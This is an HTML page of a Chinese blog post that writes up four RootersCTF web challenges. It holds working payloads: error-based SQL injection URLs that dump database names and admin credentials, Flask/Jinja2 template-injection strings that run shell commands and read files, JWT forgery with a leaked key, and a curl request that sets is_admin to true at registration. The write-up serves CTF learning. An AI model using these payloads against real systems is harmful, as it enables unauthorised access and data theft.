<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="RootersCTF复现"><meta name="keywords" content="CTF,web,Cookie攻击,SQL注入,报错注入,SSTI,JWT伪造"><meta name="author" content="ggb0n"><meta name="copyright" content="ggb0n"><title>RootersCTF复现 | ggb0n's Blog</title><link rel="shortcut icon" href="http://www.ggb0n.cool/images/icon2.png"><link rel="stylesheet" href="/css/index.css?version=1.7.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.7.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"We didn't find any results for the search: ${query}"}},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script><meta name="generator" content="Hexo 4.2.0"></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#RootersCTF-Babyweb"><span class="toc-number">1.</span> <span class="toc-text">RootersCTF-Babyweb</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#分析过程"><span class="toc-number">1.1.</span> <span class="toc-text">分析过程</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#注入过程"><span class="toc-number">1.2.</span> <span class="toc-text">注入过程</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#I-lt-3-Flask"><span class="toc-number">2.</span> <span class="toc-text">I_&lt;3_Flask</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#题目分析"><span class="toc-number">2.1.</span> <span class="toc-text">题目分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#解题"><span class="toc-number">2.2.</span> <span class="toc-text">解题</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ImgXweb"><span class="toc-number">3.</span> <span class="toc-text">ImgXweb</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#题目分析-1"><span class="toc-number">3.1.</span> <span class="toc-text">题目分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#notifyxapi"><span class="toc-number">4.</span> <span class="toc-text">notifyxapi</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#题目分析-2"><span class="toc-number">4.1.</span> <span class="toc-text">题目分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#解题-1"><span class="toc-number">4.2.</span> <span class="toc-text">解题</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="http://www.ggb0n.cool/images/header2.jpg"></div><div class="author-info__name text-center">ggb0n</div><div class="author-info__description text-center"></div><div class="follow-button"><a href="https://github.com/ggb0n" target="_blank" rel="noopener">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">22</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">90</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">Categories</span><span class="pull-right">10</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Friends Links</div><a class="author-info-links__name text-center" href="https://f61d.github.io" target="_blank" rel="noopener">f61d</a><a class="author-info-links__name text-center" href="https://15h3na0.xyz" target="_blank" rel="noopener">15h3na0</a><a class="author-info-links__name text-center" href="https://sxadmin.github.io" target="_blank" rel="noopener">Myself'</a><a class="author-info-links__name text-center" href="https://diao-diaoupup.cn" target="_blank" rel="noopener">51nd0re1</a><a class="author-info-links__name text-center" href="http://caoyi.site" target="_blank" rel="noopener">Amateur</a><a class="author-info-links__name text-center" href="https://www.cnblogs.com/ph1sh" target="_blank" rel="noopener">ph1sh</a><a class="author-info-links__name text-center" href="http://129.204.207.114:99" target="_blank" rel="noopener">HyyMbb</a><a class="author-info-links__name text-center" href="https://ajatars.github.io/" target="_blank" rel="noopener">Ajatar</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(http://www.ggb0n.cool/images/back2.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">ggb0n's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a><a class="site-page" href="/links">Friend links</a><a class="site-page" href="/about">About</a><a class="site-page" href="/tools">Tools</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> Search</span></a></span></div><div id="post-info"><div id="post-title">RootersCTF复现</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-03-13</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/CTF%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/">CTF学习记录</a><i class="fa fa-angle-right" aria-hidden="true"></i><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/CTF%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/">赛题复现</a><div class="post-meta-wordcount"><span>Word count: </span><span class="word-count">1.9k</span><span class="post-meta__separator">|</span><span>Reading time: 7 min</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h2 id="RootersCTF-Babyweb"><a href="#RootersCTF-Babyweb" class="headerlink" title="RootersCTF-Babyweb"></a>RootersCTF-Babyweb</h2><p>My junior dev just set up a password protected webpage. Can you get in?</p>
<h3 id="分析过程"><a href="#分析过程" class="headerlink" title="分析过程"></a>分析过程</h3><p>打开链接提示管理员的密码是18位，并且过滤掉了UNION SLEEP ‘ “ OR - BENCHMARK。因此利用爆破出密码是比较不现实的，结合题目提示是使用注入方法。看到单引号和双引号被过滤，猜测是被反斜杠转义掉，便尝试宽字节注入，使用<code>%df%27</code>进行测试，结果注入失败。</p>
<p>并且提示UNION、OR也都被过滤，原本想着利用大小写或者编码绕过，但是引号既然不能成功绕过，说明不能用闭合引号进行注入。经过多次尝试发现利用<code>extractvalue()</code>函数进行报错注入可以成功实现注入,因此可以结合concat函数实现注入。</p>
<p><code>extractvalue()</code>：函数功能是从目标XML中返回包含所查询值的字符串。</p>
<blockquote>
<p>EXTRACTVALUE (XML_document, XPath_string);</p>
<p>第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc<br>第二个参数：XPath_string (Xpath格式的字符串)</p>
<p>extractvalue注入的原理：如同updatexml一样，extract的第二个参数要求是xpath格式字符串，而我们输入的并不是。所以报错。</p>
</blockquote>
<h3 id="注入过程"><a href="#注入过程" class="headerlink" title="注入过程"></a>注入过程</h3><p>1、爆库名</p>
<figure class="highlight pgsql"><table><tr><td class="code"><pre><span class="line">https://babyweb.rootersctf.<span class="keyword">in</span>/<span class="keyword">index</span>.php?<span class="keyword">search</span>=<span class="number">1</span> <span class="keyword">and</span> extractvalue(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(<span class="keyword">select</span>%<span class="number">0</span>adatabase()),<span class="number">0x7e</span>))</span><br></pre></td></tr></table></figure>
<p>回显XPATH syntax error:~SQLinjection~，爆出了库名SQLinjection<br>2、爆表名</p>
<figure class="highlight pgsql"><table><tr><td class="code"><pre><span class="line">https://babyweb.rootersctf.<span class="keyword">in</span>/<span class="keyword">index</span>.php?<span class="keyword">search</span>=<span class="number">1</span> <span class="keyword">and</span> extractvalue(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(<span class="keyword">select</span> group_concat(<span class="built_in">table_name</span>) <span class="keyword">from</span> information_schema.<span class="keyword">tables</span> <span class="keyword">where</span> table_schema=<span class="keyword">database</span>()),<span class="number">0x7e</span>))</span><br></pre></td></tr></table></figure>
<p>回显XPATH syntax error:~users~，爆出了表名users<br>这里需要说名一下，由于单双引号被过滤，故注入语句中如果有字符串需要单双引号，应当尽量避免，这里可以使用查询语句的多重利用避免，当然直接填库名也是不需要单双引号的（下面表名同理）。<br>3、爆列名</p>
<figure class="highlight pgsql"><table><tr><td class="code"><pre><span class="line">https://babyweb.rootersctf.<span class="keyword">in</span>/<span class="keyword">index</span>.php?<span class="keyword">search</span>=<span class="number">1</span> <span class="keyword">and</span> extractvalue(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(<span class="keyword">select</span> group_concat(<span class="built_in">column_name</span>) <span class="keyword">from</span> information_schema.<span class="keyword">columns</span> <span class="keyword">where</span> <span class="built_in">table_name</span>=(<span class="keyword">select</span> group_concat(<span class="built_in">table_name</span>) <span class="keyword">from</span> information_schema.<span class="keyword">tables</span> <span class="keyword">where</span> table_schema=<span class="keyword">database</span>())),<span class="number">0x7e</span>))</span><br></pre></td></tr></table></figure>
<p>回显XPATH syntax error:~user、uniqueid~，爆出列名user、uniqueid，这两个列里肯定有我们需要的重要内容。<br>4、爆字段</p>
<figure class="highlight pgsql"><table><tr><td class="code"><pre><span class="line">https://babyweb.rootersctf.<span class="keyword">in</span>/<span class="keyword">index</span>.php?<span class="keyword">search</span>=<span class="number">1</span> <span class="keyword">and</span> extractvalue(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(<span class="keyword">select</span> uniqueid/<span class="keyword">user</span> <span class="keyword">from</span> users <span class="keyword">limit</span> <span class="number">1</span>),<span class="number">0x7e</span>))</span><br></pre></td></tr></table></figure>
<p>这里分两步分别爆出admin和其对应的18位的uniqueid，拿去尝试登录，成功登路并拿到flag。<br>由于环境不能复现，做题的时候也没有截图，这里不再贴出图片。</p>
<p>报错注入参考链接：<a href="https://www.jianshu.com/p/bf5edd484957" target="_blank" rel="noopener">https://www.jianshu.com/p/bf5edd484957</a></p>
<h2 id="I-lt-3-Flask"><a href="#I-lt-3-Flask" class="headerlink" title="I_&lt;3_Flask"></a>I_&lt;3_Flask</h2><p>典型的SSTI，参考国外师傅的WP学到了一些新姿势</p>
<h3 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h3><p>进入题目：<br><img src="http://www.ggb0n.cool/images/rooters1.png" alt=""></p>
<p>断定是python flask的SSTI了，但是不知道参数是啥，在复现的时候发现国外师傅提到一个参数扫描的工具<a href="https://github.com/s0md3v/Arjun" target="_blank" rel="noopener">arjun</a>，直接扫参数：<br><img src="http://www.ggb0n.cool/images/rooters2.png" alt=""></p>
<p>用<code>name</code>参数测试一下：<br><img src="http://www.ggb0n.cool/images/rooters3.png" alt=""></p>
<p>可以看到成功注入，那下面就是利用注入姿势来爆flag了。</p>
<h3 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h3><p>一种解题的payload是：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">name&#x3D;&#123;&#123;&#39;&#39;.__class__.__mro__[1].__subclasses__()[184].__init__.__globals__[&#39;__builtins__&#39;].eval(&#39;__import__(&quot;os&quot;).popen(&quot;ls&quot;).read()&#39;)&#125;&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">name&#x3D;&#123;&#123;&#39;&#39;.__class__.__mro__[1].__subclasses__()[184].__init__.__globals__[&#39;__builtins__&#39;].eval(&#39;__import__(&quot;os&quot;).popen(&quot;cat flag.txt&quot;).read()&#39;)&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>但是这种方法在复现的时候没有成功，学到另外一种姿势：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">name&#x3D;&#123;&#123;url_for.__globals__[&#39;__builtins__&#39;].open(&#39;flag.txt&#39;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="http://www.ggb0n.cool/images/rooters4.png" alt=""></p>
<p>参考：<br><a href="https://bbs.ichunqiu.com/thread-47685-1-1.html?from=aqzx8" target="_blank" rel="noopener">https://bbs.ichunqiu.com/thread-47685-1-1.html?from=aqzx8</a><br><a href="https://graneed.hatenablog.com/entry/2019/10/13/010814#Solution-2" target="_blank" rel="noopener">https://graneed.hatenablog.com/entry/2019/10/13/010814#Solution-2</a></p>
<h2 id="ImgXweb"><a href="#ImgXweb" class="headerlink" title="ImgXweb"></a>ImgXweb</h2><p>考察JWT伪造攻击。</p>
<h3 id="题目分析-1"><a href="#题目分析-1" class="headerlink" title="题目分析"></a>题目分析</h3><p>进入题目发现存在注册、登录按钮，先注册一个登录看看，发现可以进行文件上传，但是奈何本题不是考文件上传拿shell的…</p>
<p>通过扫后台发现<code>robots.txt</code>的存在（可见扫后台的重要性啊）：<br><img src="http://www.ggb0n.cool/images/rooters13.png" alt=""></p>
<p>而<code>robots.txt</code>中提示了一个<code>secretkey</code>秘钥文件的存在，内容如下：<br><img src="http://www.ggb0n.cool/images/rooters5.png" alt=""></p>
<p>给这个干嘛？结果抓包发现了另一番天地：<br><img src="http://www.ggb0n.cool/images/rooters6.png" alt=""></p>
<p>可以看到cookie采用了JWT，拿去base64解密一下（还有几篇讲到JWT伪造攻击的博客，有需要的可以看看）：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&#123;&quot;typ&quot;:&quot;JWT&quot;,&quot;alg&quot;:&quot;HS256&quot;&#125;&#123;&quot;user&quot;:&quot;ggb0n&quot;&#125;×¿ð¬Á#È¬­ í_mn×Züt</span><br></pre></td></tr></table></figure>

<p>这肯定是考JWT伪造的了，秘钥都给了，多简单，拿去网站伪造一下：<br><img src="http://www.ggb0n.cool/images/rooters7.png" alt=""></p>
<p>然后抓包改包，发现成功伪造了admin身份，从回显页面中可以看到<code>flag.png</code>的存在，这里赵师傅没有放原图，应该是为了方便BOT生成和识别固定格式的flag吧：<br><img src="http://www.ggb0n.cool/images/rooters8.png" alt=""></p>
<p>其实，flag已经很近了，查看源码可以看到flag.png的存储路径，直接访问即可拿到flag：<br><img src="http://www.ggb0n.cool/images/rooters9.png" alt=""></p>
<p><img src="http://www.ggb0n.cool/images/rooters10.png" alt=""></p>
<p>原来png不是png，而是txt啊…赵师傅badbad。。。</p>
<h2 id="notifyxapi"><a href="#notifyxapi" class="headerlink" title="notifyxapi"></a>notifyxapi</h2><p>还是考察JWT伪造攻击。</p>
<h3 id="题目分析-2"><a href="#题目分析-2" class="headerlink" title="题目分析"></a>题目分析</h3><p>进入题目，看到给出了几个利用<code>curl</code>进行注册、登录、查看通知的几个操作：<br><img src="http://www.ggb0n.cool/images/rooters11.png" alt=""></p>
<p><img src="http://www.ggb0n.cool/images/rooters12.png" alt=""></p>
<p>有点像教怎么用curl的[手动滑稽]，我们根据提供的语句去试试效果：</p>
<p>先注册个账户：</p>
<figure class="highlight cmd"><table><tr><td class="code"><pre><span class="line">curl -X POST "http://ebd88188-<span class="number">17</span>ee-<span class="number">4</span>d51-<span class="number">84</span>e5-ee623303e5aa.node3.buuoj.cn/api/v1/register/" -H "Content-<span class="built_in">Type</span>: application/json" -d '&#123;"email": "ggb0n@test.com", "password": "password"&#125;'</span><br></pre></td></tr></table></figure>

<figure class="highlight cmd"><table><tr><td class="code"><pre><span class="line">&#123;"created_user":&#123;"id":<span class="number">3</span>,"user":&#123;"email":"ggb0n@test.com","id":<span class="number">3</span>,"is_admin":false&#125;,"authentication_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1ODQwOTI2NTEsIm5iZiI6MTU4NDA5MjY1MSwianRpIjoiMTIyZDQ2MTQtNzZhYS00YjJhLTlmZWEtYmY1OTE0ZTQ5OTk0IiwiZXhwIjoxNjE1NjI4NjUxLCJpZGVudGl0eSI6MywiZnJlc2giOmZhbHNlLCJ0eXBlIjoiYWNjZXNzIn0.r8-IqT1VUwqJuYpHgKI6uqQZn6nR07RoDnDWWGgyeVc"&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>关注的点来了：<code>is_admin</code>属性为<code>false</code>，多半知道这题是干嘛的了。先不管，先登录看看：</p>
<figure class="highlight cmd"><table><tr><td class="code"><pre><span class="line">curl -X POST "http://ebd88188-<span class="number">17</span>ee-<span class="number">4</span>d51-<span class="number">84</span>e5-ee623303e5aa.node3.buuoj.cn/api/v1/login/" -H "Content-<span class="built_in">Type</span>: application/json" -d '&#123;"email": "ggb0n@test.com", "password": "password"&#125;'</span><br></pre></td></tr></table></figure>

<figure class="highlight cmd"><table><tr><td class="code"><pre><span class="line">&#123;"id":&#123;"email":"ggb0n@test.com","id":<span class="number">3</span>,"is_admin":false&#125;,"authentication_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1ODQwOTMwNDcsIm5iZiI6MTU4NDA5MzA0NywianRpIjoiZjFlYmViYjItMmFmMi00OWFjLTljN2UtNjFlODM3MTVkN2I2IiwiZXhwIjoxNjE1NjI5MDQ3LCJpZGVudGl0eSI6MywiZnJlc2giOmZhbHNlLCJ0eXBlIjoiYWNjZXNzIn0.Nj2knq7DFsNRoZhNfyAvbMp6wMPV6lWAcXM1p6xIqRo"&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到登录和注册的时候<code>JWT</code>的第三部分是不同的，也就是表示登录的状态，看通知的话，当然要先登录嘛。</p>
<p>拿登录上的JWT去看看notification什么情况：</p>
<figure class="highlight cmd"><table><tr><td class="code"><pre><span class="line">curl -H "Authorization: Bearer $ACCESS" -H "Content-<span class="built_in">Type</span>: application/json" "http://ebd88188-<span class="number">17</span>ee-<span class="number">4</span>d51-<span class="number">84</span>e5-ee623303e5aa.node3.buuoj.cn/api/v1/notifications/"</span><br></pre></td></tr></table></figure>

<figure class="highlight cmd"><table><tr><td class="code"><pre><span class="line">[&#123;"issuer":&#123;"email":"test@test.com","id":<span class="number">2</span>&#125;,"body":"hey, rosssssss","id":<span class="number">2</span>,"<span class="built_in">title</span>":"The IT Crowd"&#125;,&#123;"issuer":&#123;"email":"test@test.com","id":<span class="number">2</span>&#125;,"body":"Jen Barber? Is that the internet?","id":<span class="number">3</span>,"<span class="built_in">title</span>":"The IT Crowd"&#125;]</span><br></pre></td></tr></table></figure>

<p>通过这个请求，我们可以看到别的用户发的通知，想必管理员能看到不一样的结果吧，结合前面存在的<code>is_admin</code>属性并且为<code>false</code>，思路肯定是要去想办法让<code>is_admin</code>为<code>true</code>了。</p>
<h3 id="解题-1"><a href="#解题-1" class="headerlink" title="解题"></a>解题</h3><p>由于回显的都是注册时候的键值对，我们直接在注册的时候多加一个<code>&quot;id_admin&quot;:true</code>的属性键值对创建个账户试试：</p>
<figure class="highlight cmd"><table><tr><td class="code"><pre><span class="line">curl -X POST "http://ebd88188-<span class="number">17</span>ee-<span class="number">4</span>d51-<span class="number">84</span>e5-ee623303e5aa.node3.buuoj.cn/api/v1/register/" -H "Content-<span class="built_in">Type</span>: application/json" -d '&#123;"email": "gg.b0n@test.com", "password": <span class="number">1</span>"password","is_admin":true&#125;'</span><br></pre></td></tr></table></figure>

<figure class="highlight cmd"><table><tr><td class="code"><pre><span class="line">&#123;"created_user":&#123;"id":<span class="number">4</span>,"user":&#123;"email":"gg.b0n@test.com","id":<span class="number">4</span>,"is_admin":true&#125;,"authentication_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1ODQwOTM3MzQsIm5iZiI6MTU4NDA5MzczNCwianRpIjoiZjcyMTYzNWEtZTQ1Ny00NTA0LWI0MDEtNjlmMGM1NzM2OGI1IiwiZXhwIjoxNjE1NjI5NzM0LCJpZGVudGl0eSI6NCwiZnJlc2giOmZhbHNlLCJ0eXBlIjoiYWNjZXNzIn0.NC-cqxfT8wWgsyDzXMo04NLfAK9k7uim8M127DixOAw"&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>可见账户成功创建了，并且此时<code>is_admin</code>属性已经为<code>true</code>了，快登陆去看看通知：</p>
<figure class="highlight cmd"><table><tr><td class="code"><pre><span class="line">curl -X POST "http://ebd88188-<span class="number">17</span>ee-<span class="number">4</span>d51-<span class="number">84</span>e5-ee623303e5aa.node3.buuoj.cn/api/v1/login/" -H "Content-<span class="built_in">Type</span>: application/json" -d '&#123;"email": "gg.b0n@test.com", "password": "password"&#125;'</span><br></pre></td></tr></table></figure>

<figure class="highlight cmd"><table><tr><td class="code"><pre><span class="line">&#123;"id":&#123;"email":"gg.b0n@test.com","id":<span class="number">4</span>,"is_admin":true&#125;,"authentication_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1ODQwOTM4ODcsIm5iZiI6MTU4NDA5Mzg4NywianRpIjoiNjUzN2ZlYzMtNzYyOC00ZGZlLTk1MmQtYzE1YmQ5ODhiNjQ0IiwiZXhwIjoxNjE1NjI5ODg3LCJpZGVudGl0eSI6NCwiZnJlc2giOmZhbHNlLCJ0eXBlIjoiYWNjZXNzIn0.FiyXpksBx-zkMQDEkfW61bs2FtqttNz5Qv1yHStqWrM"&#125;</span><br></pre></td></tr></table></figure>

<p>用登录上的<code>JWT</code>去看通知：</p>
<figure class="highlight cmd"><table><tr><td class="code"><pre><span class="line">export ACCESS="eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1ODQwOTM4ODcsIm5iZiI6MTU4NDA5Mzg4NywianRpIjoiNjUzN2ZlYzMtNzYyOC00ZGZlLTk1MmQtYzE1YmQ5ODhiNjQ0IiwiZXhwIjoxNjE1NjI5ODg3LCJpZGVudGl0eSI6NCwiZnJlc2giOmZhbHNlLCJ0eXBlIjoiYWNjZXNzIn0.FiyXpksBx-zkMQDEkfW61bs2FtqttNz5Qv1yHStqWrM"</span><br><span class="line"></span><br><span class="line">curl -H "Authorization: Bearer $ACCESS" -H "Content-<span class="built_in">Type</span>: application/json" "http://ebd88188-<span class="number">17</span>ee-<span class="number">4</span>d51-<span class="number">84</span>e5-ee623303e5aa.node3.buuoj.cn/api/v1/notifications/"</span><br></pre></td></tr></table></figure>

<p>回显如下：</p>
<figure class="highlight cmd"><table><tr><td class="code"><pre><span class="line">[&#123;"issuer":&#123;"email":"admin@test.com","id":<span class="number">1</span>&#125;,"body":"rooters&#123;a_big_hard_business_in_a_big_hard_building&#125;ctf","id":<span class="number">1</span>,"<span class="built_in">title</span>":"flag"&#125;,&#123;"issuer":&#123;"email":"test@test.com","id":<span class="number">2</span>&#125;,"body":"hey, rosssssss","id":<span class="number">2</span>,"<span class="built_in">title</span>":"The IT Crowd"&#125;,&#123;"issuer":&#123;"email":"test@test.com","id":<span class="number">2</span>&#125;,"body":"Jen Barber? Is that the internet?","id":<span class="number">3</span>,"<span class="built_in">title</span>":"The IT Crowd"&#125;,&#123;"issuer":&#123;"email":"admin@test.com","id":<span class="number">1</span>&#125;,"body":"flag&#123;<span class="number">1</span>b411b83-d725-<span class="number">4</span>e8f-a50a-<span class="number">3</span>bd14a35de6a&#125;","id":<span class="number">1</span>,"<span class="built_in">title</span>":"flag"&#125;]</span><br></pre></td></tr></table></figure>

<p>成功拿到flag。<br>这题算是考察JWT伪造比较简单的了吧。</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">ggb0n</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://ggb0n.cool/2020/03/13/RootersCTF%E5%A4%8D%E7%8E%B0/">http://ggb0n.cool/2020/03/13/RootersCTF%E5%A4%8D%E7%8E%B0/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/CTF/">CTF</a><a class="post-meta__tags" href="/tags/web/">web</a><a class="post-meta__tags" href="/tags/Cookie%E6%94%BB%E5%87%BB/">Cookie攻击</a><a class="post-meta__tags" href="/tags/SQL%E6%B3%A8%E5%85%A5/">SQL注入</a><a class="post-meta__tags" href="/tags/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/">报错注入</a><a class="post-meta__tags" href="/tags/SSTI/">SSTI</a><a class="post-meta__tags" href="/tags/JWT%E4%BC%AA%E9%80%A0/">JWT伪造</a></div><div class="post-qr-code"><div class="post-qr-code-item"><img class="post-qr-code__img" src="http://ggb0n.cool/images/emFuc2hhbmc=.png"><div class="post-qr-code__desc">多谢大佬支持~</div></div></div><div class="social-share pull-right" data-disabled="douban,diandian,google,linkedin"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/03/20/SWPU2019%E5%A4%8D%E7%8E%B0/"><i class="fa fa-chevron-left">  </i><span>SWPU2019复现</span></a></div><div class="next-post pull-right"><a href="/2020/03/07/%E9%AB%98%E6%A0%A1%E6%88%98%E7%96%AB%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/"><span>高校战&quot;疫&quot;部分题解</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(http://www.ggb0n.cool/images/back2.png)"><div class="layout" id="footer"><div class="copyright">&copy;2020 by ggb0n</div><div class="footer_custom_text">一生一世，爱你一人。</div><div class="icp"><a href="http://www.beian.miit.gov.cn/" target="_blank" rel="noopener"><span>豫ICP备20003023号</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-eye"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.7.0"></script><script src="/js/fancybox.js?version=1.7.0"></script><script src="/js/sidebar.js?version=1.7.0"></script><script src="/js/copy.js?version=1.7.0"></script><script src="/js/fireworks.js?version=1.7.0"></script><script src="/js/transition.js?version=1.7.0"></script><script src="/js/scroll.js?version=1.7.0"></script><script src="/js/head.js?version=1.7.0"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">Local search</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="Search for Posts"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>Powered by</span> <a href="https://github.com/wzpan/hexo-generator-search" target="_blank" rel="noopener" style="color:#49B1F5;">hexo-generator-search</a></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>